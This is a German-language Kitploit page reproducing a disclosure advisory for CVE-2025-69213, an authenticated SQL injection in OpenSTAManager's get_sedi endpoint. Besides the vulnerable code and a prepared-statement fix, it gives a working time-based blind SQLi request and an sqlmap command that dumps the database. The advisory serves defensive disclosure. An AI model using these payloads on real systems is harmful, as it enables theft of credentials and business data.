Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-69213 — CVE-2025-69213 - OpenSTAManager has a SQL Injection in ajax_complete.php (get_sedi endpoint) | Kitploit
Tools/GitHubGitHub/lukasz-rybak/cve-2025-69213
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationDatabase Security
GitHublukasz-rybak/cve-2025-69213

CVE-2025-69213

CVE-2025-69213 - OpenSTAManager has a SQL Injection in ajax_complete.php (get_sedi endpoint)

Repository anzeigen
vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-69213: OpenSTAManager hat eine SQL-Injection in ajax_complete.php (get_sedi-Endpunkt)

Übersicht

FeldDetails
CVE-IDCVE-2025-69213
SchweregradHOCH
AdvisoryAdvisory anzeigen
Entdeckt vonLukasz Rybak

Betroffene Produkte

  • devcode-it/openstamanager (Versionen: <= 2.9.8)

CWE-Klassifizierung

  • CWE-89: Fehlerhafte Neutralisierung spezieller Elemente in einem SQL-Befehl ('SQL-Injection')

Details

Zusammenfassung

Eine SQL-Injection-Schwachstelle existiert im ajax_complete.php-Endpunkt bei der Verarbeitung der get_sedi-Operation. Ein authentifizierter Angreifer kann bösartigen SQL-Code über den idanagrafica-Parameter injizieren, was zu unbefugtem Datenbankzugriff führt.

Proof of Concept

Verwundbarer Code

Datei: modules/anagrafiche/ajax/complete.php:28

root@kitploit:~
case 'get_sedi':
    $idanagrafica = get('idanagrafica');
    $q = "SELECT id, CONCAT_WS( ' - ', nomesede, citta ) AS descrizione 
          FROM an_sedi 
          WHERE idanagrafica='".$idanagrafica."' ...";
    $rs = $dbo->fetchArray($q);

Datenfluss

  1. Quelle: $_GET['idanagrafica'] → get('idanagrafica')
  2. Verwundbar: Benutzereingabe wird direkt mit einfachen Anführungszeichen in die SQL-Abfrage konkateniert
  3. Sink: $dbo->fetchArray($q) führt die schädliche Abfrage aus

Ausnutzung

Manueller PoC (zeitbasierte Blind-SQLi):

root@kitploit:~
GET /ajax_complete.php?op=get_sedi&idanagrafica=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1 HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=<valid-session>
image

SQLMap-Ausnutzung:

root@kitploit:~
sqlmap -u "http://localhost:8081/ajax_complete.php?op=get_sedi&idanagrafica=1*" \
  --cookie="PHPSESSID=<session>" \
  --dbms=MySQL \
  --technique=T \
  --level=3 \
  --dump

SQLMap-Ausgabe:

root@kitploit:~
[INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
Parameter: #1* (URI)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: idanagrafica=1' AND (SELECT 2572 FROM (SELECT(SLEEP(5)))oOnc)-- rhVF
back-end DBMS: MySQL >= 5.0.12
image

Auswirkungen

  • Datenextraktion: Vollständige Extraktion der Datenbank, einschließlich Benutzeranmeldeinformationen, Kundendaten, Finanzunterlagen
  • Privilegienerweiterung: Änderung der zz_users-Tabelle, um Admin-Zugriff zu erlangen
  • Datenintegrität: Unbefugte Änderung oder Löschung von Datensätzen
  • Potenzielle RCE: Über SELECT ... INTO OUTFILE, falls Dateiberechtigungen dies erlauben

Betroffene Versionen

  • OpenSTAManager: Verifiziert in der neuesten Version (Stand Dezember 2025)
  • Alle Versionen, die diesen Endpunkt verwenden, sind wahrscheinlich betroffen

Behebung

Ersetzen Sie die direkte Verkettung durch vorbereitete Anweisungen:

Vorher:

root@kitploit:~
$idanagrafica = get('idanagrafica');
$q = "SELECT ... WHERE idanagrafica='".$idanagrafica."' ...";

Nachher:

root@kitploit:~
$idanagrafica = get('idanagrafica');
$q = "SELECT ... WHERE idanagrafica=".prepare($idanagrafica)." ...";

Referenzen

  • OWASP SQL Injection: https://owasp.org/www-community/attacks/SQL_Injection
  • CWE-89: Fehlerhafte Neutralisierung spezieller Elemente in einem SQL-Befehl

Anerkennung

Entdeckt von: Łukasz Rybak

Referenzen

  • https://github.com/devcode-it/openstamanager/security/advisories/GHSA-w995-ff8h-rppg
  • https://nvd.nist.gov/vuln/detail/CVE-2025-69213
  • https://github.com/advisories/GHSA-w995-ff8h-rppg

Haftungsausschluss

Diese CVE wurde im Rahmen koordinierter Offenlegungspraktiken verantwortungsvoll offengelegt. Die hier bereitgestellten Informationen dienen ausschließlich Bildungs- und Verteidigungszwecken.

Tool herunterladen